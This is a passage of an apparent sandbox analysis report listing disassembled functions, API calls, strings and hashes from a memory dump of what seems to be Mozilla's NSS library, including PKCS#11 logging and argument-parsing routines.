NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C60512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C605153
free.MOZGLUE(?), ref: 6C60516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C60517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C605195

Strings

name=, xrefs: 6C605057
nss=, xrefs: 6C605083
parameters=, xrefs: 6C60506B
config=, xrefs: 6C60509B
library=, xrefs: 6C605043

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: 9c9123a9aad23ef357ae27baaf6f1477b7a01772dae5cf20380a1140f8b3d3ef
Instruction ID: 92c19cdb05fbd24b4fc9144e278acba8abec68665e11cddc978ad0b21b74b61f
Opcode Fuzzy Hash: 9c9123a9aad23ef357ae27baaf6f1477b7a01772dae5cf20380a1140f8b3d3ef
Instruction Fuzzy Hash: B351A6B5B012056BEB14DF25DD41AAE37A89F16348F140060EC16F7B42E735E919CBBE

Function 6C604C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604C5B
PR_smprintf.NSS3(6C6DAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C604CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C604CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C604D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5F4F51,00000000), ref: 6C604D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C604D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C604DA2
free.MOZGLUE(?), ref: 6C604DB9
free.MOZGLUE(00000000), ref: 6C604DCF

Strings

rootFlags, xrefs: 6C604D47
every, xrefs: 6C604CA1
rust, xrefs: 6C604D22
slotFlags, xrefs: 6C604D34
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C604D9D
ootT, xrefs: 6C604D1A
any, xrefs: 6C604C96
%s,%s, xrefs: 6C604C4B
timeout, xrefs: 6C604C91
0x%08lx=[%s %s], xrefs: 6C604D80

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 54e15545154115c71b465d120fee82b12c0e0ea7622ed202843044031a1fa3b6
Instruction ID: b9506f5ee95d7ef3ceb5e457bf1d2160f036c7c4286c3b94f4ddb360e2d20f73
Opcode Fuzzy Hash: 54e15545154115c71b465d120fee82b12c0e0ea7622ed202843044031a1fa3b6
Instruction Fuzzy Hash: 8D417FB1A0014167DB315F159D84ABB36B5AFA330CF094124E8166BB41E771E924C7DF

Function 6C5E6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5E6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C5E6943
Part of subcall function 6C5E6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C5E6957
Part of subcall function 6C5E6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C5E6972
Part of subcall function 6C5E6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C5E6983
Part of subcall function 6C5E6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C5E69AA
Part of subcall function 6C5E6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C5E69BE
Part of subcall function 6C5E6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C5E69D2
Part of subcall function 6C5E6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C5E69DF
Part of subcall function 6C5E6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C5E6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5E6D8C
free.MOZGLUE(00000000), ref: 6C5E6DC5
free.MOZGLUE(?), ref: 6C5E6DD6
free.MOZGLUE(?), ref: 6C5E6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5E6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5E6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5E6E72
free.MOZGLUE(?), ref: 6C5E6EA7
free.MOZGLUE(?), ref: 6C5E6EC4
free.MOZGLUE(?), ref: 6C5E6ED5
free.MOZGLUE(00000000), ref: 6C5E6EE3
free.MOZGLUE(?), ref: 6C5E6EF4
free.MOZGLUE(?), ref: 6C5E6F08
free.MOZGLUE(00000000), ref: 6C5E6F35
free.MOZGLUE(?), ref: 6C5E6F44
free.MOZGLUE(?), ref: 6C5E6F5B
free.MOZGLUE(00000000), ref: 6C5E6F65

Part of subcall function 6C5E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C5E781D,00000000,6C5DBE2C,?,6C5E6B1D,?,?,?,?,00000000,00000000,6C5E781D), ref: 6C5E6C40
Part of subcall function 6C5E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C5E781D,?,6C5DBE2C,?), ref: 6C5E6C58
Part of subcall function 6C5E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C5E781D), ref: 6C5E6C6F
Part of subcall function 6C5E6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C5E6C84
Part of subcall function 6C5E6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C5E6C96
Part of subcall function 6C5E6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C5E6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5E6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5E6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C5E6FF4

Strings

+`_l, xrefs: 6C5E6D0D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`_l
API String ID: 1304971872-1736921323
Opcode ID: b2b5fde95845f03d01bed8ff07492622d51fdd48a8cff9f1d6f85f694d802d71
Instruction ID: a7fc7e4524dbc173b9f77e1a30170923edbd1cab0173573462a9442681c4a697
Opcode Fuzzy Hash: b2b5fde95845f03d01bed8ff07492622d51fdd48a8cff9f1d6f85f694d802d71
Instruction Fuzzy Hash: E5B161B1E0131D9FDF10DBA5DC84B9E7BB9AF09388F140124EA15E7A45EB31E914CBA1

Function 6C591FE0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C592007
calloc.MOZGLUE(00000001,00000084), ref: 6C592077
calloc.MOZGLUE(00000001,0000002C), ref: 6C5920DF
TlsSetValue.KERNEL32(00000000), ref: 6C592188
PR_NewCondVar.NSS3 ref: 6C5921B7
calloc.MOZGLUE(00000001,00000084), ref: 6C59221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C5922C2
GetLastError.KERNEL32 ref: 6C5922CD
free.MOZGLUE(00000000), ref: 6C5922DD

Part of subcall function 6C590F00: PR_GetPageSize.NSS3(6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F1B
Part of subcall function 6C590F00: PR_NewLogModule.NSS3(clock,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F25

Strings

T pl, xrefs: 6C592361
X pl, xrefs: 6C59218E

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID: T pl$X pl
API String ID: 3559583721-3390162276
Opcode ID: ae66d31cd9ace62caf0736434a8ffa1a4e213784c5fe874c04b64285fc0368ad
Instruction ID: 95e2c4d347c5bc0c0ed10d2572120d7739bb247818b5444a04a5764f5250d100
Opcode Fuzzy Hash: ae66d31cd9ace62caf0736434a8ffa1a4e213784c5fe874c04b64285fc0368ad
Instruction Fuzzy Hash: 47917CB1B017419FDB20EF39DC49B5B7AF4BB06708F00492EE45AD6A40DB70A508CF96

Function 6C5ADDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C5ADDDE

Part of subcall function 6C600FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5A87ED,00000800,6C59EF74,00000000), ref: 6C601000
Part of subcall function 6C600FF0: PR_NewLock.NSS3(?,00000800,6C59EF74,00000000), ref: 6C601016
Part of subcall function 6C600FF0: PL_InitArenaPool.NSS3(00000000,security,6C5A87ED,00000008,?,00000800,6C59EF74,00000000), ref: 6C60102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C5ADDF5

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C5ADE34
PR_Now.NSS3 ref: 6C5ADE93
CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C5ADE9D
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5ADEB4
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5ADEC3
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C5ADED8
PR_smprintf.NSS3(%s%s,?,?), ref: 6C5ADEF0
PR_smprintf.NSS3(6C6DAAF9,(NULL) (Validity Unknown)), ref: 6C5ADF04
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5ADF13
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5ADF22
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5ADF33
free.MOZGLUE(00000000), ref: 6C5ADF3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5ADF4B
free.MOZGLUE(00000000), ref: 6C5ADF74
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5ADF8E

Strings

{???}, xrefs: 6C5ADE8B
(NULL) (Validity Unknown), xrefs: 6C5ADEFA
%s%s, xrefs: 6C5ADEEB

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
String ID: %s%s$(NULL) (Validity Unknown)${???}
API String ID: 1882561532-3437882492
Opcode ID: 144412b0d8c0adc40e8d2f50666c4cd68c4c1a618b296248080d0d6ea0bd4147
Instruction ID: bde243aaf0c9a540b2769d225217081e7aab5eba04d012c14561ff637438d16e
Opcode Fuzzy Hash: 144412b0d8c0adc40e8d2f50666c4cd68c4c1a618b296248080d0d6ea0bd4147
Instruction Fuzzy Hash: F751C4B1E001019BDB10EFA69C41AAF7BB5AF8A358F144438EC09E7B01E731E915CBE5

Function 6C5DAF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C5DAF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5DAF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5DAF83

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5DAF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C5DAFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C5DAFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C5DAFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C5DB00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C5DB028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C5DB041

Strings

pulSignatureLen = 0x%p, xrefs: 6C5DB03C
ulParameterLen = 0x%p, xrefs: 6C5DAFD4
pParameter = 0x%p, xrefs: 6C5DAFB9
hSession = 0x%x, xrefs: 6C5DAF5E, 6C5DAF6E
ulDataLen = %d, xrefs: 6C5DB00A
pData = 0x%p, xrefs: 6C5DAFEF
nkl, xrefs: 6C5DB059, 6C5DB093
(CK_INVALID_HANDLE), xrefs: 6C5DAF7C
C_SignMessage, xrefs: 6C5DAF41
pSignature = 0x%p, xrefs: 6C5DB023

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$nkl
API String ID: 1003633598-2905834296
Opcode ID: 1806580145a9c27e25ad93b9b228d655403875f83c08a6fe8fc57252bd1f4a9c
Instruction ID: a3c232a9535c24c5257dd0fe8c32755af5e0e5ecec0e3b25e4bf49a8e1b3163a
Opcode Fuzzy Hash: 1806580145a9c27e25ad93b9b228d655403875f83c08a6fe8fc57252bd1f4a9c
Instruction Fuzzy Hash: CF4184B6701245EFDB00AF54DD48A8A7BB2EB8231DF494078E50867612DF34D958CBAF

Function 6C5E2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C5E2DEC
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C5E2E00
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5E2E2B
PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C5E2E43
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C,?,-00000001,00000000,?), ref: 6C5E2E74
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C5B4F1C,?,-00000001,00000000), ref: 6C5E2E88
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5E2EC6
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5E2EE4
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C5E2EF8
PR_Unlock.NSS3(?), ref: 6C5E2F62
TlsGetValue.KERNEL32 ref: 6C5E2F86
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5E2F9E
PR_Unlock.NSS3(?), ref: 6C5E2FCA
TlsGetValue.KERNEL32 ref: 6C5E301A
EnterCriticalSection.KERNEL32(?), ref: 6C5E302E
PR_Unlock.NSS3(?), ref: 6C5E3066
PR_SetError.NSS3(00000000,00000000), ref: 6C5E3085
PR_Unlock.NSS3(?), ref: 6C5E30EC
TlsGetValue.KERNEL32 ref: 6C5E310C
EnterCriticalSection.KERNEL32(0000001C), ref: 6C5E3124
PR_Unlock.NSS3(?), ref: 6C5E314C

Part of subcall function 6C5C9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C5F379E,?,6C5C9568,00000000,?,6C5F379E,?,00000001,?), ref: 6C5C918D
Part of subcall function 6C5C9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C5F379E,?,6C5C9568,00000000,?,6C5F379E,?,00000001,?), ref: 6C5C91A0

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

PR_SetError.NSS3(00000000,00000000), ref: 6C5E316D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
String ID:
API String ID: 3383223490-0
Opcode ID: 8dbfc6f1b2e22f909f4b2d2b1abccf6e27fe76dd04fa27397a1c80f93837b9a4
Instruction ID: 4466e98a4ec7e688e7f70a83968ec96aa1dce9bca807fca7f377aef2a3b52599
Opcode Fuzzy Hash: 8dbfc6f1b2e22f909f4b2d2b1abccf6e27fe76dd04fa27397a1c80f93837b9a4
Instruction Fuzzy Hash: 3BF1BEB5E00219EFDF00DF68DC84B9ABBB5BF09318F044569EC15A7721EB31A995CB81

Function 6C5D6D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_Digest), ref: 6C5D6D86
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D6DB4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D6DC3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D6DD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C5D6DFA
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C5D6E13
PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C5D6E2C
PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C5D6E47
PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C5D6EB9

Strings

pulDigestLen = 0x%p, xrefs: 6C5D6E42
C_Digest, xrefs: 6C5D6D81
*pulDigestLen = 0x%x, xrefs: 6C5D6EB4
hSession = 0x%x, xrefs: 6C5D6D9E, 6C5D6DAE
ulDataLen = %d, xrefs: 6C5D6E0E
pData = 0x%p, xrefs: 6C5D6DF5
nkl, xrefs: 6C5D6E61, 6C5D6E95
(CK_INVALID_HANDLE), xrefs: 6C5D6DBC
pDigest = 0x%p, xrefs: 6C5D6E27

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulDigestLen = 0x%x$ hSession = 0x%x$ pData = 0x%p$ pDigest = 0x%p$ pulDigestLen = 0x%p$ ulDataLen = %d$ (CK_INVALID_HANDLE)$C_Digest$nkl
API String ID: 1003633598-2963096691
Opcode ID: 64d58a1f8b6b8b51a02f7f0f39f86f4ac41686dac2ca9455ef8d93f8e4e911d9
Instruction ID: 4015f95e781c705531c0a5ff17bd805dd65cdfdd7c7893b855927275d61818a8
Opcode Fuzzy Hash: 64d58a1f8b6b8b51a02f7f0f39f86f4ac41686dac2ca9455ef8d93f8e4e911d9
Instruction Fuzzy Hash: AE41B7B5701245EFDB00EF58DD49B8B3BB1EB82319F454428E808A7612DF30E859CF9A

Function 6C5D9C40 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_LoginUser), ref: 6C5D9C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C5D9C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C5D9CA3

Part of subcall function 6C6BD930: PL_strncpyz.NSS3(?,?,?), ref: 6C6BD963

PR_LogPrint.NSS3(?,00000000), ref: 6C5D9CB9
PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C5D9CDA
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C5D9CF5
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C5D9D10
PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C5D9D29
PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C5D9D42

Strings

C_LoginUser, xrefs: 6C5D9C61
ulUsernameLen = %d, xrefs: 6C5D9D3D
hSession = 0x%x, xrefs: 6C5D9C7E, 6C5D9C8E
nkl, xrefs: 6C5D9D5A, 6C5D9D91
ulPinLen = %d, xrefs: 6C5D9D0B
userType = 0x%x, xrefs: 6C5D9CD5
pUsername = 0x%p, xrefs: 6C5D9D24
(CK_INVALID_HANDLE), xrefs: 6C5D9C9C
pPin = 0x%p, xrefs: 6C5D9CF0

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

